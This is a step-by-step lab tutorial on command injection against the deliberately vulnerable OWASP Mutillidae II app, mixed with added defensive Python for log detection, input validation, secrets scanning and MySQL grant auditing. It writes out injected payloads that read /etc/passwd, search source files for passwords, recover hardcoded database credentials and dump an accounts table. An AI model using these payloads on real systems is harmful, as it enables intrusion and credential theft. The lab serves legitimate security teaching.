{ Command Injection Database Interrogation }
Section 0. Background Information |
- What is Mutillidae?
- OWASP Mutillidae II is a free, open source, deliberately vulnerable web application that provides a practice target for web-security enthusiasts.
- What is Command Injection?
- Command Injection occurs when an attacker is able to run operating system commands or server-side scripts through the web application. This vulnerability typically appears when a web application lets the user run tools such as nslookup, whois, ping or traceroute from a web page. You can test for the vulnerability with a technique called fuzzing, where a ";" or "|" or "||" or "&" or "&&" is appended to the end of the expected input (e.g., www.cnn.com) followed by a command (e.g., cat /etc/passwd).
- What is Fuzzing?
- Fuzz testing or fuzzing is a software testing technique that involves providing invalid, unexpected, or random data to the inputs of a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. Fuzzing is commonly used to test for security problems in software or computer systems.
- Pre-Requisite Lab
- Mutillidae: Lesson 1: How to Install Mutillidae in Fedora
- Note: Remote database access has been turned on to provide an additional vulnerability.
- BackTrack: Lesson 1: Installing BackTrack 5
- Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
- Lab Notes
- In this lab we will do the following:
- Exploit a command injection/execution fuzzing vulnerability.
- Operating System Reconnaissance
- Application home directory Reconnaissance
- Database Reconnaissance
- Encoding PHP Script to view contents
- Remotely connecting to database
- Legal Disclaimer - do not apply these tutorials to systems you are not authorized to test.
Section 1. Configure Fedora14 Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Programs --> VMWare --> VMWare Player
- Edit Fedora Mutillidae Virtual Machine Settings
- Instructions:
- Highlight fedora14
- Click Edit virtual machine settings
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tihqt5KSKh0CULIYHLcAHgQabs0iWI3Dw9ecLM5T8JFgCtfOdpUt7zUzPiNb90I2-u3V2vCQws35O-jhRXuOnlFEHzh7mNOlRY13YjnV2pjQAXIAtuPoGos8zPzRlh3agdWDl8b949CRBY4OWIU9-5exeO8MIPy0aV6yT_nfRCaTEMM56dig=s0-d)
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click the OK Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tx4AWhPL6csLg6txt6Mauc8k5E1_G9ANlktnSsKnMMdRlnn-VTCExo3___Iyos0RGkCKakMPYb815NezyAt8pgw-Uwk2bLEzQjYA6xfk7NgwJK9KvH9lovrEazx2B2NuasNvAFszVNsHV2FB68zQQwUlnT-mOHvz1If4SJ6th_UmuLioP1Dg=s0-d)
Section 2. Login to Fedora14 - Mutillidae |
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
- Select Fedora14 - Mutillidae
- Play virtual machine
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uaVWXH2-ZI7l7uVJ6EXc3GNIsQokF3vL0fgDpe8tKqzJZSAhZyXWEQfJsRikOjVxDExUF7ry3eoFCWLHxEIQvLQob3YDA6htxjsRW1yRl2mUx15iabX7L-Sim14GkQMN3tGuKVbM-zDcNxCs6ezjZRw262Jm7fpTz-AuT64CIgkeHxkpwLDDSa=s0-d)
- Login to Fedora14 - Mutillidae
- Instructions:
- Login: student
- Password: <whatever you set it to>.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sDMNRXy30dBeD-mKnkGAxKEB9bdsSBfaDkYHrpb8XqVrgRbKwiKePHiMWyxs1LivpZ_4eZI84UrbhQT_l4dTM3a4rbDFiSzZFvyHl-s1fHscFuQSeqj6JzUxv-79muplGJ4mSNIa6O5YgFXJ7vSebvuWSR3myOmmp2J4hMoK22NY7BQ90Z_NwPkA=s0-d)
Section 3. Open Console Terminal and Retrieve IP Address |
- Start a Terminal Console
- Instructions:
- Applications --> Terminal
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s5D0yPEyyP52dngWqn9p2AlbxUtVNK2m4HUA4rx-x--nbdQJF8pPS6taBZ1o9xj_HOtnNm5P1M1YprHaY3r71f8f1uNcAMxH_wl3i5ZCCiweUDXi6nqguhx5uqnJfxZlEMtmSrzwFF5upZw9snkGf3Q5QrWa0iEdy2bQR5tlGjMgGP3-2MOI-r=s0-d)
- Switch user to root
- Instructions:
- su - root
- <Whatever you set the root password to>
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_toNRuj-yFFENEOyTKGwVsxC1kPGsomqevYtJKNakDbcw1S1XSebAqCE-IRWXXgWvNLoIfHKgx41oQexwjss3S5RX4t0FrYXpbJODqao5awWX8TXvZ3ZE2-czQcezcehEh-MbQ92U1yICyBS76wyLXY7fBS2lnc1GOwylWOATM0edBxibWCbcci_g=s0-d)
- Get IP Address
- Instructions:
- ifconfig -a
- Notes (FYI):
- As indicated below, my IP address is 192.168.1.111.
- Please record your IP address.
Section 4. Configure BackTrack Virtual Machine Settings |
- Edit the BackTrack5R1 VM
- Instructions:
- Select BackTrack5R1 VM
- Click Edit virtual machine settings
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_slLxZmH_kW8EU1hQU9WH-p1CI70TTS8TufL_HfqQVNc6vzDocPdwqQhCzzHZ7N1H41NQn8Ttrc1o2ISgpLBXCMPtcEOQkyr4YaoQgfGkTPvuvEhW4dvJsf3kpaK6XSvrZ5UsFGiePtmXGHC1fI5snOGa0hYi1cLrXVnoXeE1UtHwDTm_xxIb8=s0-d)
- Edit Virtual Machine Settings
- Instructions:
- Click on Network Adapter
- Click on the Bridged Radio button
- Click on the OK Button
Section 5. Play and Login to BackTrack |
- Play the BackTrack5R1 VM
- Instructions:
- Click on the BackTrack5R1 VM
- Click on Play virtual machine
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sm41qA5myDPqXfu_bSySt7sokTHKSvqRKGcnG2bP6VDlc2Do9VzYCnEHAVRG2qlhr5o4BejDBa97U0eT4y_Ys4t8ng_kjcRogN4wO1kivAiCyGBh9oI8_QIsT_A1P_E59v9LrhvZQiAeqpcFlTP9azxEH27ZReu4ufKZyhjoZ7lo0uAF6BcdM=s0-d)
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed it to>.
- Bring up the GNOME
- Instructions:
- Type startx
Section 6. Open Console Terminal and Retrieve IP Address |
- On BackTrack, Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Obtain the IP Address
- Instructions:
- ifconfig -a
- Note(FYI):
- My IP address is 192.168.1.109.
- In your case, it will probably be different.
- This is the machine that will be used to attack the victim machine (Metasploitable).
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s4TYmVP_aon1fQH26nCMa9Ezf3wgRJDAI_yH1pnea7QW7fyzvPCPKCAVviRBBt5Rv-9Nc61oHzuCAX8Aqm2u13GW6-lqlUMS0xxiGgyHDEdHDRMSKlyliUnCCjdL35qWywkdu53FoZYZ3XK9QNfnQAiNDpIxLqUUSTQNDyduAXf0XN6msO8sJG=s0-d)
Section 7. Start Web Browser Session to Mutillidae |
- On BackTrack, Open Firefox
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_se214O5EKFKsOxmOfiWUW5fubqsagColio_x06vzqaL-sZTtDTOZnLYcZ9K8xrCowyryLtrHPz-8k4aiMbUHJlyyzaciQJTcVKCYrg7f02O70SJjsh9jYhle0yVa0_LYU6pjpGSQi0OoxBGOguKYVADRhgpRWbxt24daaoCbUP60YJLtO3j0E=s0-d)
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- http://192.168.1.111/mutillidae
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vxO_5r35E7tOaqwA73hMWHmiBxDdVov6gZYN5nP_7CYg3yN8Nxom0WkrXMNvdMagyhMS_VxgH4LDHh6dqMHJoE3lVEVUHNLY2f3lZy6ah9O5sDNV1opmQKoy2YPOdMJXPCH9-9vhktnCcrJIufw_51_KIy63jIwPrSRkYrjbieOn79A2qPWFU=s0-d)
Section 8. Basic Command Execution Testing |
- Go to DNS Lookup
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vVBhtLp0JvRJskXOBtCdL-I8TcDG2ZnaOJV1dKEapzLIxBRM_nNSFVE783IUI2o05nRDvcaCFkBQNf4EpeKR_BeYHUpPVLTY-gnRwFu6ltIquduCZOYaXy7iZBNVbod7XTrXMPGSS-Q1DyekYIEdL9MSo-I2sVw1vHffbEkS6UC5Q5Pr3QZbEk=s0-d)
- Test DNS Lookup
- Notes (FYI):
- DNS Lookup on the surface is designed to do just that: provide a DNS lookup.
- Instructions:
- Hostname/IP: www.cnn.com
- Click the Lookup DNS button
- View your Results
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sQLrW1mrr8L9S0OwC70qr0OyIOLECBc3e3kevW04gF4X82NtbkQ8GQBi4IKxBenLpsaDw9VAq5DsJYKQGZO7bg3DuLDbnzTAJ3zm7Dslbh71V5ztI0AJJ8pm5rj-H9hokAIv0EjgJacor5Zowwvv9fvDZihJiO0xxsZ-DidJl2a6Ri9SxNWvsf=s0-d)
- Test DNS Lookup Vulnerability
- Notes (FYI):
- Now we will test a security vulnerability that lets us append a Unix/Linux command to the end of the hostname we are looking up.
- The procedure of appending a ";" after what the application expects is called command fuzzing.
- Below you will run the "uname -a" command
- Instructions:
- Hostname/IP: www.cnn.com; uname -a
- Click the Lookup DNS button
- View your Results
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vZ2Bg8LPYm0If0asdR5Dp2fKyRVCD1xdyLO9j8H7nq2VK8xpWXtrBLvmKftpJwGonMo_BolZanB064z9APZnk7iL7_O4XXFkdN9dD4s8_aFc7hBovr7kCT-s-vTtVMM1TO5nDsdvILvZ-vYlVc4qvq693_HwkzO-HoBb1i0j2wHV2Tw8HNv-OE=s0-d)
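The "; uname -a" request above leaves a trace on the server. As an added example (not code from the original page or from the Mutillidae project), the following Python script scans Apache-style access-log lines for DNS Lookup requests whose hostname parameter carries shell metacharacters, which is how a defender would spot this kind of fuzzing. The log lines are constructed for the example; the parameter name target_host and the use of GET (POST bodies are not written to the access log) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines (not real traffic from the lab).
SAMPLE_LOG = """\
192.168.1.109 - - [10/Mar/2013:14:02:11 -0500] "GET /mutillidae/index.php?page=dns-lookup.php HTTP/1.1" 200 4120
192.168.1.109 - - [10/Mar/2013:14:02:40 -0500] "POST /mutillidae/index.php?page=dns-lookup.php HTTP/1.1" 200 4388
192.168.1.109 - - [10/Mar/2013:14:03:05 -0500] "GET /mutillidae/index.php?page=dns-lookup.php&target_host=www.cnn.com%3B+uname+-a HTTP/1.1" 200 4510
192.168.1.109 - - [10/Mar/2013:14:03:30 -0500] "GET /mutillidae/index.php?page=dns-lookup.php&target_host=www.cnn.com%7C%7C+id HTTP/1.1" 200 4502
192.168.1.109 - - [10/Mar/2013:14:04:01 -0500] "GET /mutillidae/index.php?page=dns-lookup.php&target_host=www.cnn.com HTTP/1.1" 200 4400
"""

# Request line inside the quotes: METHOD TARGET HTTP/x.y
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Characters that separate or chain shell commands (the fuzzing separators
# named in the lab) plus backticks and $( ) command substitution.
SHELL_META_RE = re.compile(r'[;|&`\n]|\$\(')


def extract_lookup_params(line, page="dns-lookup.php", param="target_host"):
    """Return the decoded hostname values sent to the DNS Lookup page on this
    log line, or None if the line is not a request to that page."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # parse_qs undoes percent-encoding and '+' so we inspect the real value.
    qs = parse_qs(url.query, keep_blank_values=True)
    if page not in qs.get("page", []):
        return None
    return qs.get(param, [])


def find_injection_attempts(log_text):
    """Return (line number, decoded value) for every lookup parameter that
    contains a shell metacharacter."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        values = extract_lookup_params(line)
        if not values:
            continue
        for value in values:
            if SHELL_META_RE.search(value):
                hits.append((lineno, value))
    return hits


if __name__ == "__main__":
    for lineno, value in find_injection_attempts(SAMPLE_LOG):
        print(f"line {lineno}: suspicious target_host {value!r}")
```

Decoding before matching matters: the separator arrives as %3B, so a rule that looks for a literal ";" in the raw log line never fires. Benign lookups such as line 5 produce no hit.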
- Perform Reconnaissance
- Notes (FYI):
- Don't you think it would be nice to know where this particular web application is running from?
- Now we are going to run the "pwd" command to show us the current working directory.
- Also, notice in the Address Bar that the application is called dns-lookup.php
- Instructions:
- Hostname/IP: www.cnn.com; pwd
- Click the Lookup DNS button
- View your Results
- Notice that dns-lookup.php is the vulnerable program.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vBHjWAX4Arxs5k5FYhyrFENwhq32f1Udg0mh3DYd8JepN2e5pjcX0MoW8erMgCYq4w3VH7Jqql6KqesLshMIXIYwpEhMECsa7CzPbmKcgov2htOpXPPCLWw0V83MgdCG9Ras4zhqx6Gu_ZAxJ5trTQQJyqtQZ5hmDvWERZ4NAxDHEeNzK_kr1y=s0-d)
- Interrogate the dns-lookup.php application
- Notes (FYI):
- Just for grins, let's see if we can find the line of code where PHP is executing a system call.
- I will use the xargs command to search, using egrep, for the following strings: exec OR system OR virtual.
- Instructions:
- Hostname/IP:
- www.cnn.com; find /var/www/html/mutillidae -name "dns-lookup.php" | xargs egrep '(exec|system|virtual)'
- Click the Lookup DNS button
- View your Results
- Notice there is a function called shell_exec(), that is actually executing the Linux command "nslookup".
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uOJ4Ud0tX0fir2ErMo_eiLGDXPUu4DOqHXsmo9F1j1VurAr1-P2aBC94OezAdWnOBBbLcEddtuymPZ4KWiHT6EPyJAeSNLdmWJ_1Cme81QnjRfP4463TOBj0JA5JK9JgLNCXbPn5g5o6pjGpZdOEoSp-PZgvjIxbPDi1CAi2pw2KbdSsZnyToD=s0-d)
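The shell_exec() call found above is the root cause: the hostname is concatenated into a command string and handed to a shell. As an added example (my code, not the dns-lookup.php source or any Mutillidae code), the following Python module shows the same vulnerable construction next to two fixes: shell-quoting the argument (the equivalent of PHP's escapeshellarg) and, better, allow-list validation of the hostname with the command executed as an argv list and no shell at all. The function names and the hostname grammar are my own choices.

```python
import html
import re
import shlex
import subprocess

# Hostname grammar (RFC 1123 labels): letters, digits and hyphens, no leading
# or trailing hyphen, at most 63 characters per label and 253 overall.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def vulnerable_command(target_host):
    """The pattern the lab finds in dns-lookup.php: user input concatenated
    straight into a string that a shell will run. Everything after ';' is
    executed as a second command."""
    return "nslookup " + target_host


def quoted_command(target_host):
    """Partial mitigation: shell-quote the argument (PHP's escapeshellarg does
    the same). The injected text is now one argument to nslookup rather than
    a separate command, but the value still reaches a shell."""
    return "nslookup " + shlex.quote(target_host)


def is_valid_hostname(value):
    """Allow-list check: accept only strings shaped like a hostname or IP.
    A leading '-' is rejected, so option injection into nslookup is blocked."""
    return bool(HOSTNAME_RE.match(value))


def safe_command(target_host):
    """Preferred fix: validate, then build an argv list. The list goes to
    execve directly, so ';', '|', '&&' and backticks have no special meaning."""
    if not is_valid_hostname(target_host):
        raise ValueError("target_host is not a valid hostname")
    return ["nslookup", target_host]


def run_safe_lookup(target_host, timeout=10):
    """Run the lookup without a shell and HTML-encode the tool output before
    it is placed in a page, so the response cannot inject markup either."""
    result = subprocess.run(
        safe_command(target_host),
        capture_output=True,
        text=True,
        timeout=timeout,
        check=False,
    )
    return html.escape(result.stdout + result.stderr)


if __name__ == "__main__":
    payload = "www.cnn.com; uname -a"
    print("vulnerable:", vulnerable_command(payload))
    print("quoted:    ", quoted_command(payload))
    print("validated: ", is_valid_hostname(payload))
```

run_safe_lookup() needs a working nslookup on the host; the other functions only build commands and can be exercised offline. The validation step is the one to rely on: quoting alone keeps the process alive in a shell, which is where every later mistake becomes exploitable again.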
Section 9. Database Reconnaissance |
- Discover the Database Engine using the /etc/passwd file
- Notes (FYI):
- Let's search the /etc/passwd file for the following strings: postgres, sql, db2 and ora.
- Instructions:
- Hostname/IP:
- www.cnn.com; cat /etc/passwd | egrep -i '(postgres|sql|db2|ora)'
- Click the Lookup DNS button
- View your Results
- MySQL is the database engine
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uxTPzDo6D33BCvYoP4BGMPDrLZ3HjskuIUPRwrWHbwFmryWoMpw6XIvx8t9ZcaNFqPOlSkfR-xFczI0PY109_tBAYzYsuTy4wE-dELP3REXhxe78LwCM3LkKkclP7JzOyL7cFeko2Ix2TE1ULxfE7gXv7KulCmP28WUye1G5_PD9PfxbyaR9M=s0-d)
- Discover the Database Engine using the "ps" command
- Notes (FYI):
- Let's use the "ps" command to search for the following process strings: postgres, sql, db2 and ora.
- Instructions:
- Hostname/IP:
- www.cnn.com; ps -eaf | egrep -i '(postgres|sql|db2|ora)'
- Click the Lookup DNS button
- View your Results
- The mysqld (daemon) is running.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vw-JoZqAoZOoBkky7UVLbnDI2WVZ732WgmEzKFgpS6aDu7ilp3OGuEn7yVpKCGWy0X-dXsqfl19yQW8Pgjl5cV-XVzaZquQYvYoVIczgT1E9G2csj53dpvdgeFrTn5pwvElAHALrAG2rgE7k7pqhxmM6JuZqPXB4kmEPJQxzdOLb2MaS79ig=s0-d)
Section 10. Database Interrogation |
- List all php scripts
- Notes (FYI):
- Our next step is to try to figure out if any of the php scripts located under /var/www/html/mutillidae contain a database username and password.
- But, first list all the php scripts.
- Instructions:
- Hostname/IP:
- www.cnn.com; find /var/www/html/mutillidae -name "*.php"
- Click the Lookup DNS button
- View your Results
- There are over 900 php scripts.
- Search php scripts for the string password
- Notes (FYI):
- Now we will search the 900+ php scripts for lines that contain both the string "password" and "=".
- Instructions:
- Hostname/IP:
- www.cnn.com; find /var/www/html/mutillidae -name "*.php" | xargs grep -i "password" | grep "="
- Click the Lookup DNS button
- View your Results (Continue to next step).
- Obtain password from search results
- Notes (FYI):
- Now you have to look closely to see the string password and the actual password "samurai".
- Instructions:
- Notice that the MySQLHandler.php contains the following string:
- $mMySQLDatabasePassword = "samurai";
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uUOfxJMIa5_UpsNk228LOo7dMtMsKBYYslLhntE2Ka2weNH3kA3ggB_VFJlyQs90Jw2YJpUNOb1_WvxtKI3w0gDeWLaYQwbGcN_TBC9mC-BIOFEXGAXt_Ct1DCvlL3RZGJ0y7qdbpuV3IjCEGJAMAdN7oE1c6opWdxR_8XBaa267uJbVEr_UM=s0-d)
- Search MySQLHandler.php for the strings user OR login
- Notes (FYI):
- We now know that MySQLHandler.php contains the database password.
- The only thing left is to obtain the database username that goes with the password samurai.
- Instructions:
- Hostname/IP:
- www.cnn.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs egrep -i '(user|login)' | grep "="
- Click the Lookup DNS button
- View your Results (Continue to next step).
- Obtain username from search results
- Instructions:
- Notice that the MySQLHandler.php contains the following string:
- $mMySQLDatabaseUsername = "root";
- Notice the MySQL connection method.
- mMySQLConnection = new mysqli($HOSTNAME, $USERNAME, $SAMURAI_WTF_PASSWORD);
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sp9w-yk-29-d9aqqh9Dq1uqSWmo6hLKyIr5NJ7bklCI88KsBH2Nl3smxYv_pM39vQYVvVoeMWXcLeO23AOpbUFiAnU5oNaWkTj-zsUrS_PK-P2tDRvfdkieZ3op7qcyaR-OY0q2-4iG_ipr12wANRxLs6a3S0fgHNIUQaufmDPPR6ztSJNqSxG=s0-d)
- Display MySQLHandler.php
- Notes (FYI):
- I guess I could have shown you this first, but good things come to those that wait.
- It is possible to display the contents of the MySQLHandler.php program by encoding the "<?php" and "?>" tags. These tags mark the PHP code; left unencoded in the page output, the browser treats them as markup and the code is not shown as text. To get around this problem and just display the text of the program, we change "<" to "&lt;" and ">" to "&gt;".
- Instructions:
- Hostname/IP:
- www.cnn.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\&lt;/g' | sed 's/>/\&gt;/g'
- Click the Lookup DNS button
- View your Results (Continue to next step).
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sf9nlFdmNqk4DndXrBIZTJF3gEBOtfLPxbfTn3P7twwUXO5BcUyKUoO18_s6V1r495tn5V5_B-VwcPjqR2xA4IQnc9ZdFvsPKeR4nC_DFRSU8sRKoH69w-sadMNvbFz8iMK-ogIglC60-B8ZHR3DRL55fBhr9h_loCPZo4D84KGI2WDBhOc56I=s0-d)
- Viewing the Code
- Notes (FYI):
- Kind of scary,,, right?
- You should never hard-code authentication information into a program that accesses a database on behalf of a web application.
- Instructions:
- Database Username
- static public $mMySQLDatabaseUsername = "root";
- Database Password
- static public $mMySQLDatabasePassword = "samurai";
- Database Name
- static public $mMySQLDatabaseName = "nowasp";
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vgaQ17Q0WkmmmAbixy96AFaAqu4Gce05q1V0xh08ZWcO_OKyb3zybJ0JEmFXB2cdcw8VxWWtiEaaFCagRoUQY27y3GhimzhqeMZ2pIW03KLBs2YHv8d-AKGve_rqWQgh5uQ1p-I016WHY9UB9R9vqp1vLVQpqVxaaO2uzsstjLpvPXzn2_nDkL=s0-d)
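The find | xargs grep search used in this section is, in effect, a secrets scan; a defender should run the same search over their own code before an attacker does. As an added example (not code from the page or from Mutillidae), the following Python script generalizes that grep into a scanner for credential-looking PHP assignments and shows the fix the lab points at: reading the database settings from the environment instead of from source. The PHP fragment is constructed to mirror the lines shown above and is not the real MySQLHandler.php; the variable names DB_HOST, DB_USER, DB_PASSWORD and DB_NAME are my own.

```python
import re

# Constructed PHP fragment modelled on the lines the lab uncovers (not the
# real MySQLHandler.php).
SAMPLE_PHP = '''<?php
class MySQLHandler {
    static public $mMySQLDatabaseHost = "localhost";
    static public $mMySQLDatabaseUsername = "root";
    static public $mMySQLDatabasePassword = "samurai";
    static public $mMySQLDatabaseName = "nowasp";
    static public $mRetryCount = 3;
    // $mLegacyPassword = "old"; commented-out code still leaks secrets
}
?>'''

# A PHP variable whose name suggests a credential, assigned a quoted literal.
# Case-insensitive so Password, PASSWD and pwd are all caught.
CRED_RE = re.compile(
    r'\$(?P<name>\w*(?:pass(?:word|wd)?|pwd|secret|user(?:name)?|login)\w*)'
    r'\s*=\s*(?P<quote>["\'])(?P<value>.*?)(?P=quote)\s*;',
    re.IGNORECASE,
)


def find_hardcoded_credentials(source):
    """Return (line number, variable name, literal value) for each suspicious
    assignment. Comments are scanned too: a commented-out password is still
    a password in the repository."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in CRED_RE.finditer(line):
            hits.append((lineno, m.group("name"), m.group("value")))
    return hits


def load_db_credentials(env):
    """The safer pattern: settings come from the process environment (or a
    file outside the web root readable only by the service account), and the
    application refuses to start when any of them is missing rather than
    silently falling back to a default such as root/samurai."""
    required = ("DB_HOST", "DB_USER", "DB_PASSWORD", "DB_NAME")
    missing = [key for key in required if not env.get(key)]
    if missing:
        raise RuntimeError("missing database settings: " + ", ".join(missing))
    return {key: env[key] for key in required}


if __name__ == "__main__":
    import os
    for lineno, name, value in find_hardcoded_credentials(SAMPLE_PHP):
        print(f"line {lineno}: ${name} = {value!r}")
    try:
        print(load_db_credentials(os.environ))
    except RuntimeError as err:
        print(err)
```

Moving the values out of the PHP file also defeats the exact path used in this lab: with command injection an attacker can still read any file the web server user can read, so the settings file must be owned by a different account and not be world-readable, and the database account should be a restricted application user rather than root.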
Section 11. Connect Remotely to MySQL |
- On BackTrack, Open a Terminal
- Instructions:
- Click on the Terminal Icon
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uXEefFjdmVEK9zqfHMnRec2qOc8wHSOuvInuVEEsu37LYD3MuH6XQJvhVnFQszwyJiz3UZe-ZQBQn1zxFVv2ZpEbJBbA_5R45HjsGbQAiUqjH4jCThzNzFzTYOVxhez9gA1adv9nfb7tBrkdXdyhvAruioKaaU41HrUFy7fUZVkBjwaDpJIw=s0-d)
- Connect Remotely to the Mutillidae Database
- Notes (FYI):
- Replace 192.168.1.111 with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- mysql -h 192.168.1.111 -uroot -psamurai
- show databases;
- use nowasp;
- Table Navigation
- Notes (FYI):
- Basically, we are looking for a table that contains username and password information.
- In this case, the accounts table contains the authentication information.
- Instructions:
- show tables;
- desc accounts;
- Display Account Table Records
- Instructions:
- select * from accounts;
- quit;
- Proof of Lab
- Notes (FYI):
- Replace 192.168.1.111 with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- cd
- mysql -h 192.168.1.111 -uroot -psamurai -e "select * from nowasp.accounts" > account.txt
- ls -l account.txt
- date
- echo "Your Name"
- Replace the string "Your Name" with your actual name.
- e.g., echo "John Gray"
- Proof of Lab Instructions:
- Do a PrtScn
- Paste into a word document
- Upload to website www.antoanthongtin.edu.vn
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sWoFfWxwwYlG-RVSIoORwLyz5mAlm_gmY_8yDNbq3zNsESikMor6mDG7Oq6WUoVQwSp1JUXlO2_qAF0MZO5v5ZohWPvjmIGcsmnwo3t8GYN01uYoKCerpZ7rgNowufo2kPmXY42lcAsyOzcxK6p10MXHxroqjoosNax2vExpfBnmcAA9Ft-aZZ=s0-d)
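Section 11 only works because the lab turned on remote access for the root account (Section 0). As an added example (not part of the page or of Mutillidae), the following Python function audits rows from the MySQL user table for the grants that make this possible: root reachable from any host other than localhost, wildcard hosts, and anonymous or passwordless accounts. The rows are constructed; they assume the (user, host, authentication_string) column layout of SELECT user, host, authentication_string FROM mysql.user, and the hash placeholders are not real values.

```python
# Constructed rows shaped like: SELECT user, host, authentication_string
# FROM mysql.user;  The "*HASH" strings are placeholders, not real hashes.
SAMPLE_USERS = [
    ("root", "localhost", "*HASH"),
    ("root", "%", "*HASH"),              # what the lab relies on
    ("nowasp_app", "127.0.0.1", "*HASH"),
    ("", "localhost", ""),               # anonymous account, no password
    ("report", "192.168.1.%", "*HASH"),
]

LOCAL_HOSTS = ("localhost", "127.0.0.1", "::1")


def audit_mysql_users(rows):
    """Return (user, host, reason) for each grant that widens who can log in
    to the database server and from where."""
    findings = []
    for user, host, auth in rows:
        if user == "root" and host not in LOCAL_HOSTS:
            findings.append((user, host, "root account reachable over the network"))
        elif "%" in host or "_" in host:
            findings.append((user, host, "wildcard host allows remote connections"))
        if user == "" or auth == "":
            findings.append((user, host, "anonymous or passwordless account"))
    return findings


def remediation_sql(findings):
    """Produce the DROP USER statements an administrator would review before
    running; the application account on 127.0.0.1 is left alone."""
    return ["DROP USER '%s'@'%s';" % (user, host) for user, host, _ in findings]


if __name__ == "__main__":
    for user, host, reason in audit_mysql_users(SAMPLE_USERS):
        print(f"'{user}'@'{host}': {reason}")
    print("\n".join(remediation_sql(audit_mysql_users(SAMPLE_USERS))))
```

Pair the account clean-up with a bind-address of 127.0.0.1 in the MySQL server configuration when the web and database tiers share a host, so a stolen password from a file like MySQLHandler.php cannot be used from another machine as it is in the Proof of Lab step.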